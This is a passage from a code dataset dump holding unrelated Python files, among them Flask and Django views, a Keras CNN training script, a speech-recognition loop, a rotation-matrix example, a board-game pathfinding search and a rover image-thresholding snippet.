helpers.make_xeditable),\n ('Modified Date', 'modifiedOn', helpers.make_xeditable),\n ('File Name', 'fileName', helpers.make_xeditable) \n ]\n }\n\n implementation = u\n class BatchExceptionDatatableView(XEditableDatatableView):\n model = BatchException\n template_name = 'users/x_editable_columns.html'\n datatable_options = {\n \t 'columns': [\n ('ID', 'batchExcpetionID', helpers.make_xeditable),\n ('Batch Id', 'batchID', helpers.make_xeditable),\n ('Created By', 'createdBy', helpers.make_xeditable),\n ('Created Date', 'createdOn', helpers.make_xeditable),\n ('Modified By', 'modifiedBy', helpers.make_xeditable),\n ('Modified Date', 'modifiedOn', helpers.make_xeditable),\n ('File Name', 'fileName', helpers.make_xeditable)\n ]\n } \n
                                                                                                                // Page javascript                                                                                                                             datatableview.auto_initialize = false;                                                                                                         $(function(){                                                                                                                                      var xeditable_options = {};\n             datatableview.initialize($('.datatable'), {                                                                                                   fnRowCallback: datatableview.make_xeditable(xeditable_options),                                                          \n        });                                                                                                                           \n    })\"\"\"\n","sub_path":"clo_project/clo_project/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"233862307","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport multiprocessing\nimport threading\nimport time\nimport traceback\nfrom enum import Enum\n\nfrom webapp_config import APP_URL_PREFIX\n\nfrom flask import Blueprint, Response, request\n\nblueprint = Blueprint(\"webapp-event\", __name__, url_prefix=APP_URL_PREFIX)\n\n\nclass EVENT_TYPE(Enum):\n    CONTROL = \"control\"\n    SCHEDULE = \"schedule\"\n    LOG = \"log\"\n\n\n# NOTE: サイズは上の Enum の個数+1 にしておく\nevent_count = multiprocessing.Array(\"i\", 4)\n\nis_stop_watch = False\n\n\ndef notify_watch_impl(queue):\n    global is_stop_watch\n\n    logging.info(\"Start notify watch thread\")\n\n    while True:\n        if is_stop_watch:\n            break\n        try:\n            if not queue.empty():\n                notify_event(queue.get())\n            time.sleep(0.1)\n        except OverflowError:  # pragma: no cover\n            # NOTE: テストする際,freezer 使って日付をいじるとこの例外が発生する\n            logging.debug(traceback.format_exc())\n            pass\n\n    logging.info(\"Stop notify watch thread\")\n\n\ndef notify_watch(queue):\n    global is_stop_watch\n\n    is_stop_watch = False\n    threading.Thread(target=notify_watch_impl, args=(queue,)).start()\n\n\ndef stop_watch():\n    global is_stop_watch\n\n    is_stop_watch = True\n\n\ndef event_index(event_type):\n    if event_type == EVENT_TYPE.CONTROL:\n        return 0\n    elif event_type == EVENT_TYPE.SCHEDULE:\n        return 1\n    elif event_type == EVENT_TYPE.LOG:\n        return 2\n    else:  # pragma: no cover\n        return 3\n\n\ndef notify_event(event_type):\n    global event_count\n    event_count[event_index(event_type)] += 1\n\n\n@blueprint.route(\"/api/event\", methods=[\"GET\"])\ndef api_event():\n    global event_count\n\n    count = request.args.get(\"count\", 0, type=int)\n\n    def event_stream():\n        last_count = []\n        for i in range(len(event_count)):\n            last_count.append(event_count[i])\n\n        i = 0\n        while True:\n            time.sleep(1)\n            for name, event_type in EVENT_TYPE.__members__.items():\n                index = event_index(event_type)\n\n                if last_count[index] != event_count[index]:\n                    logging.debug(\"notify event: {name}\".format(name=event_type.value))\n                    yield \"data: {}\\n\\n\".format(event_type.value)\n                    last_count[index] = event_count[index]\n            i += 1\n\n            if i == count:\n                return\n\n    res = Response(event_stream(), mimetype=\"text/event-stream\")\n    res.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n    res.headers.add(\"Cache-Control\", \"no-cache\")\n    res.headers.add(\"X-Accel-Buffering\", \"no\")\n\n    return res\n","sub_path":"flask/lib/webapp_event.py","file_name":"webapp_event.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"368276201","text":"\nclass Sector:\n\n    def __init__(self):\n        # armazena o nome da rua\n        self.street =\"\"\n\n        self.data = \"\"\n        self.hora = \"\"\n\n        #armazena o  numero atribuido ao setor da rua\n        self.sectorNumber = \"\"\n\n        #armazena a velocidade media\n        self.averageSpeed =  0.0\n\n        self.amountBus = 0\n\n        self.busList = []\n","sub_path":"Sector.py","file_name":"Sector.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"168209894","text":"\"\"\"\r\n依次绕着X,Y,Z固定轴旋转变换矩阵\r\n\"\"\"\r\nimport numpy as np\r\nfrom numpy import sin, cos\r\n\r\n# 保留三位小数,不使用科学技术法\r\nnp.set_printoptions(precision=3, suppress=True)\r\n\r\nq_x = np.radians(-90)\r\nq_y = np.radians(0)\r\nq_z = np.radians(-90)\r\n\r\nR_x = np.array([\r\n    [1, 0, 0],\r\n    [0, cos(q_x), - sin(q_x)],\r\n    [0, sin(q_x),   cos(q_x)],\r\n])\r\n\r\nR_y = np.array([\r\n    [cos(q_y), 0, sin(q_y)],\r\n    [0, 1, 0],\r\n    [-sin(q_y), 0, cos(q_y)],\r\n])\r\n\r\nR_z = np.array([\r\n    [cos(q_z), - sin(q_z), 0],\r\n    [sin(q_z),   cos(q_z), 0],\r\n    [0, 0, 1],\r\n])\r\n\r\nprint(R_x)\r\n\r\nR = R_z @ R_y @ R_x\r\nprint(R)\r\n","sub_path":"day24-坐标系与空间变换/代码/CoordinateFrame/07-RotationMatrix.py","file_name":"07-RotationMatrix.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"227376754","text":"import os\r\nimport time\r\nimport tensorflow as tf\r\nimport numpy\r\nimport random\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\nfrom keras import *\r\nfrom keras import utils as np_utils\r\nfrom keras.layers import *\r\nfrom keras.models import Model,load_model,model_from_json\r\nfrom keras import backend as K\r\nfrom keras.callbacks import CSVLogger,EarlyStopping,ModelCheckpoint,TensorBoard,ReduceLROnPlateau\r\nfrom keras.optimizers import Adam\r\nfrom Capsule_Keras import *\r\nfrom evaluate_tools import plot_confusion_matrix,evaluate\r\nimport keras.backend.tensorflow_backend as KTF\r\nfrom utils import *\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\nwidth=420\r\nheight=131\r\nnum_of_classes=3\r\nbatch_size=32\r\ntrain_mapping_file='./data/CNN_x_y_mapping.csv'\r\nvali_mapping_file='./data/CNN_vali_x_y_mapping.csv'\r\nmappings=[train_mapping_file,vali_mapping_file]\r\n\r\npolluted_train_basedir='./data/polluted'\r\npositive_train_basedir='./data/positive'\r\nnegative_train_basedir='./data/negative'\r\npolluted_vali_basedir='./data/vali/polluted'\r\npositive_vali_basedir='./data/vali/positive'\r\nnegative_vali_basedir='./data/vali/negative'\r\nbasedirs=[polluted_train_basedir,positive_train_basedir,negative_train_basedir,polluted_vali_basedir,positive_vali_basedir,negative_vali_basedir]\r\n\r\ndef config_environment(args):\r\n    os.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\n    config = tf.ConfigProto()\r\n    config.gpu_options.allow_growth=True\r\n    session = tf.Session(config=config)\r\n    KTF.set_session(session)\r\n    batch_size=args.batch\r\n    \r\n\r\ndef get_model(args):\r\n    model=Sequential()\r\n    model.add(Conv2D(32,(3,3),input_shape=(args.height,args.width,3),data_format='channels_last'))\r\n    model.add(Activation('relu'))\r\n    model.add(MaxPool2D(pool_size=(2,2)))\r\n\r\n    model.add(Conv2D(64,(3,3)))\r\n    model.add(Activation('relu'))\r\n    model.add(MaxPool2D(pool_size=(2,2)))\r\n    model.add(Dropout(0.25))\r\n\r\n    model.add(Flatten())\r\n    model.add(Dense(32))\r\n    model.add(Activation('relu'))\r\n    model.add(BatchNormalization())\r\n    model.add(Dense(args.n_labels))\r\n    model.add(Activation('softmax'))\r\n    \r\n    model.summary()\r\n    return model\r\n\r\ndef train(args):\r\n    model=get_model(args)\r\n    model.compile(loss='categorical_crossentropy',optimizer=Adam(),metrics=['accuracy'])\r\n\r\n    if not os.path.exists('./log'):\r\n        os.mkdir('./log')\r\n    nowtime=time.strftime(\"%Y-%m-%d-%H:%M\", time.localtime())\r\n    print(\"######### TRAINING FILE POSTFIX #########\")\r\n    print(\" \"*13,nowtime)\r\n    print(\"#########################################\")\r\n    scriptBackuper(os.path.basename(__file__),nowtime)\r\n    cblog = CSVLogger('./log/cnn_'+nowtime+'.csv')\r\n    cbtb = TensorBoard(log_dir='./Graph',batch_size=args.batch)\r\n    cbckpt=ModelCheckpoint('./models/cnn_'+nowtime+'_best.h5',monitor='val_loss',save_best_only=True)\r\n    cbes=EarlyStopping(monitor='val_loss', patience=10, verbose=0, mode='auto')\r\n    cbrlr=ReduceLROnPlateau()\r\n    x_train_list,y_train,indexes=read_x_y_mapping(mappings,basedirs,'train',not args.balance,args)\r\n    x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        model.fit_generator(\r\n            data_generator(True,x_train_list,y_train,args,indexes),\r\n            validation_data=(x_vali,y_vali),\r\n            validation_steps=1,\r\n            steps_per_epoch=(15),\r\n            epochs=args.epochs,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([0.092,0.96,0.94] if not args.balance else [1,1,1])\r\n        )\r\n        model.save('./models/cnn_'+nowtime+'.h5')\r\n        model.save_weights('./models/cnn_'+nowtime+'_weight.h5')\r\n        jst=model.to_json()\r\n        with open('./models/cnn_'+nowtime+'_json.h5','w') as file:\r\n            file.write(jst)\r\n        \r\n        y_pred=model.predict(x_vali)\r\n        y_pred=np.argmax(y_pred,axis=1)\r\n        y_ture=np.argmax(y_vali,axis=1)\r\n        labels=['negative','positive','polluted']\r\n        plot_confusion_matrix(y_ture,y_pred,labels)\r\n        evaluate(y_ture,y_pred)\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n    \r\ndef train_on_positive(args):\r\n    model=get_model(args)\r\n    model.compile(loss='categorical_crossentropy',optimizer=Adam(),metrics=['accuracy'])\r\n\r\n    if not os.path.exists('./log'):\r\n        os.mkdir('./log')\r\n    nowtime=time.strftime(\"%Y-%m-%d-%H:%M\", time.localtime())\r\n    print(\"######### TRAINING FILE POSTFIX #########\")\r\n    print(\" \"*13,nowtime)\r\n    print(\"#########################################\")\r\n    scriptBackuper(os.path.basename(__file__),nowtime)\r\n    cblog = CSVLogger('./log/cnn_'+nowtime+'.csv')\r\n    cbtb = TensorBoard(log_dir='./Graph',batch_size=args.batch)\r\n    cbckpt=ModelCheckpoint('./models/cnn_'+nowtime+'_best.h5',monitor='val_loss',save_best_only=True)\r\n    cbes=EarlyStopping(monitor='val_loss', patience=10, verbose=0, mode='auto')\r\n    cbrlr=ReduceLROnPlateau()\r\n    x_train_list,y_train,t_indexes=read_x_y_mapping(mappings,basedirs,'train',not args.balance,args)\r\n    x_vali_list,y_vali,v_indexes=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_train_list=x_train_list[t_indexes[1][0]:t_indexes[1][1]+1]\r\n    y_train=y_train[t_indexes[1][0]:t_indexes[1][1]+1]\r\n    x_vali_list=x_vali_list[v_indexes[1][0]:v_indexes[1][1]+1]\r\n    y_vali=y_vali[v_indexes[1][0]:v_indexes[1][1]+1]\r\n    x_train=load_all_valid(x_train_list,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        datagen = ImageDataGenerator(\r\n            featurewise_center=False,  # set input mean to 0 over the dataset\r\n            samplewise_center=False,  # set each sample mean to 0\r\n            featurewise_std_normalization=False,  # divide inputs by std of the dataset\r\n            samplewise_std_normalization=False,  # divide each input by its std\r\n            zca_whitening=False,  # apply ZCA whitening\r\n            zca_epsilon=1e-06,  # epsilon for ZCA whitening\r\n            rotation_range=0,  # randomly rotate images in the range (degrees, 0 to 180)\r\n            # randomly shift images horizontally (fraction of total width)\r\n            width_shift_range=0.1,\r\n            # randomly shift images vertically (fraction of total height)\r\n            height_shift_range=0.1,\r\n            shear_range=0.,  # set range for random shear\r\n            zoom_range=0.,  # set range for random zoom\r\n            channel_shift_range=0.,  # set range for random channel shifts\r\n            # set mode for filling points outside the input boundaries\r\n            fill_mode='nearest',\r\n            cval=0.,  # value used for fill_mode = \"constant\"\r\n            horizontal_flip=False,  # randomly flip images\r\n            vertical_flip=True,  # randomly flip images\r\n            # set rescaling factor (applied before any other transformation)\r\n            rescale=None,\r\n            # set function that will be applied on each input\r\n            preprocessing_function=None,\r\n            # image data format, either \"channels_first\" or \"channels_last\"\r\n            data_format=None,\r\n            # fraction of images reserved for validation (strictly between 0 and 1)\r\n            validation_split=0.0)\r\n\r\n        # Compute quantities required for feature-wise normalization\r\n        # (std, mean, and principal components if ZCA whitening is applied).\r\n        datagen.fit(x_train)\r\n        model.fit_generator(\r\n            datagen.flow(x_train, y_train,\r\n                        batch_size=args.batch),\r\n            validation_data=(x_vali,y_vali),\r\n            validation_steps=1,\r\n            steps_per_epoch=15,\r\n            epochs=10,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([1,1,1])\r\n        )\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n    return model,nowtime\r\n\r\ndef train_on_all(args,model,nowtime):\r\n    x_train_list,y_train,indexes=read_x_y_mapping(mappings,basedirs,'train',False,args)\r\n    x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    try:\r\n        model.fit_generator(\r\n            data_generator(True,x_train_list,y_train,args,indexes),\r\n            validation_data=(x_vali,y_vali),\r\n            validation_steps=1,\r\n            steps_per_epoch=(15),\r\n            epochs=args.epochs,\r\n            callbacks=[cblog,cbtb,cbckpt],\r\n            class_weight=([0.092,0.96,0.94] if not args.balance else [1,1,1])\r\n        )\r\n        model.save('./models/cnn_'+nowtime+'.h5')\r\n        model.save_weights('./models/cnn_'+nowtime+'_weight.h5')\r\n        jst=model.to_json()\r\n        with open('./models/cnn_'+nowtime+'_json.h5','w') as file:\r\n            file.write(jst)\r\n        \r\n        y_pred=model.predict(x_vali)\r\n        y_pred=np.argmax(y_pred,axis=1)\r\n        y_ture=np.argmax(y_vali,axis=1)\r\n        labels=['negative','positive','polluted']\r\n        plot_confusion_matrix(y_ture,y_pred,labels)\r\n        evaluate(y_ture,y_pred)\r\n    except KeyboardInterrupt:\r\n        os.system(\"sh purge.sh \"+nowtime)\r\n\r\ndef test(args):\r\n    model=load_model(args.model)\r\n    x_vali_list,y_vali,_=read_x_y_mapping(mappings,basedirs,'vali',False,args)\r\n    x_vali=load_all_valid(x_vali_list,args)\r\n    y_pred=model.predict(x_vali)\r\n    y_pred=np.argmax(y_pred,axis=1)\r\n    y_ture=np.argmax(y_vali,axis=1)\r\n    labels=['negative','positive','polluted']\r\n    plot_confusion_matrix(y_ture,y_pred,labels)\r\n    evaluate(y_ture,y_pred)\r\n\r\nif __name__==\"__main__\":\r\n    import argparse\r\n    parser=argparse.ArgumentParser(description=\"CNN on TB\")\r\n    parser.add_argument('--tstrain',action='store_true',help='Training mode (positove first)')\r\n    parser.add_argument('--train',action='store_true',help='Training mode')\r\n    parser.add_argument('--test',action='store_true',help='Testing mode')\r\n    parser.add_argument('--dev',action='store_true',help='Dev mode')\r\n    parser.add_argument('-m','--model',type=str,help='The model you want to test on')\r\n    parser.add_argument('--width',type=int,default=420)\r\n    parser.add_argument('--height',type=int,default=131)\r\n    parser.add_argument('--batch',type=int,default=32,help='Batch size')\r\n    parser.add_argument('--epochs',type=int,default=200,help='#Epochs')\r\n    parser.add_argument('--balance',action='store_true',help='Balance data by undersampling the majiroty data')\r\n    parser.add_argument('--n_labels',type=int,default=3)\r\n    args=parser.parse_args()\r\n    config_environment(args)\r\n    if args.train:\r\n        print(\"TS Training mode\")\r\n        if args.balance:\r\n            args.batch-=(args.batch%3)\r\n        train(args)\r\n    if args.tstrain:\r\n        print(\"Training mode\")\r\n        if args.balance:\r\n            args.batch-=(args.batch%3)\r\n        model,nowtime=train_on_positive(args)\r\n        train_on_all(args,model,nowtime)\r\n    if args.test:\r\n        print(\"Testing mode\")\r\n        test(args)\r\n    if args.dev:\r\n        print(\"Dev mode\")\r\n","sub_path":"saved_do_not_del_src/cnn_2019-03-20-14:44.py","file_name":"cnn_2019-03-20-14:44.py","file_ext":"py","file_size_in_byte":10932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"130570592","text":"\nimport speech_recognition as sr\n\n\ndef EscreveArquivo(mensagem):\n    try:\n        with open(\"transcricao_audio.txt\", \"a\") as file:\n            file.write(str(mensagem) + \"\\n\")\n            file.close()\n    except:\n        print(\"Erro na Escrita da \" + mensagem)\n\n\nr = sr.Recognizer()\nmensagem = \"\"\n\nwhile(mensagem != \"desligar\"):\n    with sr.Microphone() as source:\n        r.adjust_for_ambient_noise(source)\n        print(\"Diga Algo:\")\n        audio = r.listen(source)\n        print(\"Hello\")\n\n\n    try:\n        mensagem = r.recognize_google(audio, language='pt-BR')\n        print(\"Você falou: \" + mensagem)\n    except sr.UnknownValueError:\n        print(\"Google Speech Recognition não pode entender o que você falou!\")\n    except sr.RequestError as e:\n        print(\"Não foram obtidos resultados do  Google Speech Recognition service; {0}\".format(e))\n\n    EscreveArquivo(mensagem)","sub_path":"voice_recognizer.py","file_name":"voice_recognizer.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"626594679","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Event\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\n\ndef index(request):\n    events = Event.objects.all()\n    paginator = Paginator(events, 2)\n    page = request.GET.get('page')\n    paged_event = paginator.get_page(page)\n\n    context = {\n        'events': paged_event\n    }\n    return render(request, 'events/events.html', context)\n\n\ndef event(request, event_id):\n    event = get_object_or_404(Event, pk=event_id)\n    event_context = {\n        'event': event,\n    }\n    return render(request, 'events/event.html', event_context)\n\n","sub_path":"randr/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"190902959","text":"class Solution:\n    # Sliding Window\n    def maxSatisfied(self, customers: List[int], grumpy: List[int], minutes: int) -> int:\n        start, maxSatisfied, currSatisfied = 0, 0, 0\n        nonGrumpySum = 0\n        for i in range(len(customers)):\n            # use sliding window to find the best place to apply \"minutes\"\n            if grumpy[i] == 1:\n                currSatisfied += customers[i]\n            if i - start + 1 > minutes:\n                if grumpy[start] == 1:\n                    currSatisfied -= customers[start]\n                start += 1\n            maxSatisfied = max(maxSatisfied, currSatisfied)\n\n            # keep track non-grumpy value\n            if grumpy[i] == 0:\n                nonGrumpySum += customers[i]\n        return nonGrumpySum + maxSatisfied\n","sub_path":"1052.GrumpyBookstoreOwner.py","file_name":"1052.GrumpyBookstoreOwner.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"286253723","text":"\n\"\"\"Create an application instance or show a QWebEngineView.\n    A very recommendable read is here:\n        https://hackingandslacking.com/demystifying-flasks-application-context-c7bd31a53817\"\"\"\n\n\n# Include dependencies. @see https://stackoverflow.com/a/56999264\ndef include():\n    from os import getenv\n    from pathlib import Path\n    from sys import path, version\n\n    if __name__ == '__main__' or 'gunicorn' in getenv(key='_') or 'uwsgi' in getenv(key='_'):\n        path.append(Path.cwd().joinpath('__pypackages__', version[:3], 'lib').__str__())\n        if not getenv(key='FLASK_SKIP_DOTENV'):\n            from dotenv import load_dotenv\n\n            load_dotenv(dotenv_path='.env')\n    if '.' in __name__:\n        path.append(Path.cwd().joinpath('src').__str__())\n\n\ndef load(config_object=None):\n    include()\n    from util.main import app, boot\n    boot(conf_obj=config_object)\n\n    return app\n\n\napp = load()\n\nif __name__ == '__main__':\n    from util.ui import UI\n    UI().run(app=app)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"119519888","text":"import sys\nimport copy\n\nsys.path.append(\"../simpleai\")\nsys.path.append(\"../PythonAdvanced2BA/AIproject\")\n\nfrom simpleai.search import astar, SearchProblem\nfrom kingandassassins import KingAndAssassinsClient, BOARD, KingAndAssassinsState\n\nDIRECTIONS = KingAndAssassinsState.DIRECTIONS\n\n\nclass KingPath(SearchProblem):\n    \"\"\"\n    Searches for the shortest path for the king to arrive at his castle, this does not take into account other pieces\n    on the board that could block the king.\n    \"\"\"\n\n    def actions(self, state):\n        # If the king is on the castle door, the only action is to enter...\n        if state == (2, 2):\n            return [('move', 2, 2, 'N')]\n        elif state == (4, 1):\n            return [('move', 4, 1, 'W')]\n\n        actions = []\n\n        # Try moves in all 4 directions\n        for d, move in DIRECTIONS.items():\n            s = (state[0] + move[0], state[1] + move[1])\n            if self._is_valid(s):\n                actions.append(('move', state[0], state[1], d))\n        return actions\n\n    def result(self, state, action):\n        return (state[0] + DIRECTIONS[action[3]][0], state[1] + DIRECTIONS[action[3]][1])\n\n    def is_goal(self, state):\n        return state == (1, 2) or state == (4, 0)\n\n    def cost(self, state, action, state2):\n        return 1\n\n    def heuristic(self, state):\n        return min(manathan_distance(state, (1, 2)), manathan_distance(state, (4, 0)))\n\n    def _is_valid(self, state):\n        if state[0] < 0 or state[0] > 9 or state[1] < 0 or state[1] > 9:\n            return False\n        if BOARD[state[0]][state[1]] == \"R\":\n            return False\n        return True\n\n\nclass MaximizeProblem(SearchProblem):\n\n    def score(self, state, action, state2):\n        raise NotImplementedError\n\n\nclass MaximizeNode:\n\n    def __init__(self, state, parent=None, action=None, cost=0, score=0, problem=None,\n                 depth=0):\n        self.state = state\n        self.parent = parent\n        self.action = action\n        self.cost = cost\n        self.score = score\n        self.problem = problem or parent.problem\n        self.depth = depth\n\n    def expand(self, local_search=False):\n        '''Create successors.'''\n        new_nodes = []\n        for action in self.problem.actions(self.state):\n            new_state = self.problem.result(self.state, action)\n            cost = self.problem.cost(self.state, action, new_state)\n            score = self.problem.score(self.state, action, new_state)\n            nodefactory = self.__class__\n            new_nodes.append(nodefactory(state=new_state,\n                                         parent=None if local_search else self,\n                                         problem=self.problem,\n                                         action=action,\n                                         cost=self.cost + cost,\n                                         score=self.score + score,\n                                         depth=self.depth + 1))\n        return new_nodes\n\n    def path(self):\n        '''Path (list of nodes and actions) from root to this node.'''\n        node = self\n        path = []\n        while node:\n            path.append((node.action, node.state))\n            node = node.parent\n        return list(reversed(path))\n\n    def __eq__(self, other):\n        return isinstance(other, MaximizeNode) and self.state == other.state\n\n    def __lt__(self, other):\n        return isinstance(other, MaximizeNode) and self.score < other.score\n\n    def __gt__(self, other):\n        return isinstance(other, MaximizeNode) and self.score > other.score\n\n\ndef maximize(problem, cost_limit, fringe=None, node_factory=MaximizeNode):\n    n_processed = n_fringe = n_replaced = 0\n    fringe = fringe or []\n    reach = []\n    memory = set()\n    initial_node = node_factory(state=problem.initial_state,\n                                problem=problem)\n    fringe.append(initial_node)\n\n    while fringe:\n        node = fringe.pop()\n        memory.add(node.state)\n\n        if node.cost < cost_limit:\n            expanded = node.expand()\n\n            for n in expanded:\n                n_processed += 1\n\n                if n.cost > cost_limit:\n                    expanded.remove(n)\n                    continue\n\n                if n.depth > 2 and n.cost <= 1:\n                    continue\n\n                # This is very expensive :(\n                others = [x for x in fringe if x == n]\n\n                assert len(others) in (0, 1)\n                if n.state not in memory and len(others) == 0:\n                    fringe.append(n)\n                    n_fringe += 1\n                elif len(others) > 0 and n.cost < others[0].cost:\n                    fringe.remove(others[0])\n                    fringe.append(n)\n                    n_replaced += 1\n\n        else:\n            reach.append(node)\n\n    print(\"Processed: \", n_processed, \"\\nFringe:\", n_fringe, \"\\nReplaced:\", n_replaced)\n\n    return max(reach) if len(reach) > 0 else initial_node\n\n\nclass KingTurn(MaximizeProblem):\n    \"\"\"\n    Searches for the shortest path for the king to arrive at his castle, this does not take into account other pieces\n    on the board that could block the king.\n    \"\"\"\n\n    def __init__(self, initial_state=None):\n        self.king = None\n        self.knights = None\n        self.citizens = None\n        self.assassins = None\n        super().__init__(initial_state)\n\n    def actions(self, state):\n        self.king, self.knights, self.citizens, self.assassins = self._pawn_positions(state.people)\n\n        actions = []\n\n        if state.action_points['king'] > 0:\n            # If the king is on the castle door, the only action is to enter...\n            if self.king == (2, 2):\n                return [('move', 2, 2, 'N')]\n            elif self.king == (4, 1):\n                return [('move', 4, 1, 'W')]\n\n            # Try to move the king in all 4 directions\n            for d, move in DIRECTIONS.items():\n                k = (self.king[0] + move[0], self.king[1] + move[1])\n                # print(\"King from\", self.king, \"to\", k, \"is\", \"valid\" if self._is_king_valid(state, k) else \"not valid\")\n                if self._is_king_valid(state, k):\n                    actions.append(('move', self.king[0], self.king[1], d))\n\n        if state.action_points['knights'] > 0:\n            # Try to move the knights\n            for knight in self.knights:\n                for d, move in DIRECTIONS.items():\n                    k = (knight[0] + move[0], knight[1] + move[1])\n                    # print(\"Knight from\", knight, \"to\", k, \"is\",\n                    #       \"valid\" if self._is_knight_valid(state, k) else \"not valid\")\n                    if self._is_knight_valid(state, k):\n                        actions.append(('move', knight[0], knight[1], d))\n\n        # print(\"ACTIONS POSSIBLE: \", actions)\n        return actions\n\n    def result(self, state, action):\n        s = state.duplicate()\n        x, y = (action[1], action[2])\n        dx, dy = tuple(DIRECTIONS[action[3]])\n        p = s.people[x][y]\n        s.people[x][y] = None\n        s.people[x + dx][y + dy] = p\n\n        moved = state.people[action[1]][action[2]]\n        if moved == \"knight\":\n            s.action_points['knights'] -= 1\n        else:\n            s.action_points['king'] -= 1\n        # s.prettyprint()\n        return s\n\n    def cost(self, state, action, state2=None):\n        moved = state.people[action[1]][action[2]]\n\n        if moved == \"knight\":\n            x, y = (action[1] + DIRECTIONS[action[3]][0], action[2] + DIRECTIONS[action[3]][1])\n            if BOARD[x][y] == \"R\":\n                return 2\n        return 1\n\n    def score(self, state, action, state2):\n        moved = state.people[action[1]][action[2]]\n\n        if moved == \"king\":\n            king = (self.king[0] + DIRECTIONS[action[3]][0], self.king[1] + DIRECTIONS[action[3]][1])\n\n            path_result = astar(KingPath(initial_state=(action[1], action[2])))\n            if action == path_result.path()[0][0]:\n                print(\"YES, good job...\")\n                return 5\n\n            d1 = min(manathan_distance(self.king, (1, 2)), manathan_distance(self.king, (4, 0)))\n            d2 = min(manathan_distance(king, (1, 2)), manathan_distance(king, (4, 0)))\n            score = 3 if d1 - d2 > 0 else -1\n            return score\n\n        else:\n            knight = (action[1] + DIRECTIONS[action[3]][0], action[2] + DIRECTIONS[action[3]][1])\n            d1 = manathan_distance((action[1], action[2]), self.king)\n            d2 = manathan_distance(knight, self.king)\n            score = 1 if d1 - d2 > 0 else 0\n            return score\n\n    def _is_king_valid(self, state, king):\n        # Check king\n        if king[0] < 0 or king[0] > 9 or king[1] < 0 or king[1] > 9:\n            return False\n        if BOARD[king[0]][king[1]] == \"R\":\n            return False\n        if state.people[king[0]][king[1]] is not None:\n            return False\n\n        return True\n\n    def _is_knight_valid(self, state, knight):\n        # Check king\n        if knight[0] < 0 or knight[0] > 9 or knight[1] < 0 or knight[1] > 9:\n            # print(\"out of board\")\n            return False\n        if state.people[knight[0]][knight[1]] is not None:\n            # print(\"occupied\", state.people[knight[0]][knight[1]])\n            return False\n\n        return True\n\n    def _pawn_positions(self, state):\n        king = None\n        knights = []\n        citizens = []\n        assassins = []\n\n        for x, row in enumerate(state):\n            # print(\"\")\n            for y, p in enumerate(row):\n                # print(p)\n                if p is None:\n                    continue\n                elif p == \"knight\":\n                    knights.append((x, y))\n                elif p == \"king\":\n                    king = (x, y)\n                elif p == \"assassin\":\n                    assassins.append((x, y))\n                else:\n                    citizens.append((x, y))\n\n        return (king, knights, citizens, assassins)\n\n\ndef manathan_distance(p1, p2):\n    return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n","sub_path":"pathfinding.py","file_name":"pathfinding.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"618883422","text":"import numpy as np\nimport cv2\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n    # Create an array of zeros same xy size as img, but single channel\n    color_select = np.zeros_like(img[:,:,0])\n    # Require that each pixel be above all three threshold values in RGB\n    # above_thresh will now contain a boolean array with \"True\"\n    # where threshold was met\n    above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n                & (img[:,:,1] > rgb_thresh[1]) \\\n                & (img[:,:,2] > rgb_thresh[2])\n    # Index the array of zeros with the boolean array and set to 1\n    color_select[above_thresh] = 1\n    # Return the binary image\n    return color_select\n\n# Define a function to convert to rover-centric coordinates\ndef rover_coords(binary_img):\n    # Identify nonzero pixels\n    ypos, xpos = binary_img.nonzero()\n    # Calculate pixel positions with reference to the rover position being at the \n    # center bottom of the image.  \n    x_pixel = np.absolute(ypos - binary_img.shape[0]).astype(np.float)\n    y_pixel = -(xpos - binary_img.shape[0]).astype(np.float)\n    return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n    # Convert (x_pixel, y_pixel) to (distance, angle) \n    # in polar coordinates in rover space\n    # 